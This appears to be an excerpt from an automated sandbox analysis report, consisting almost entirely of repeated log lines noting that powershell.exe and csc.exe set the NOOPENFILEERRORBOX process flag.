      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
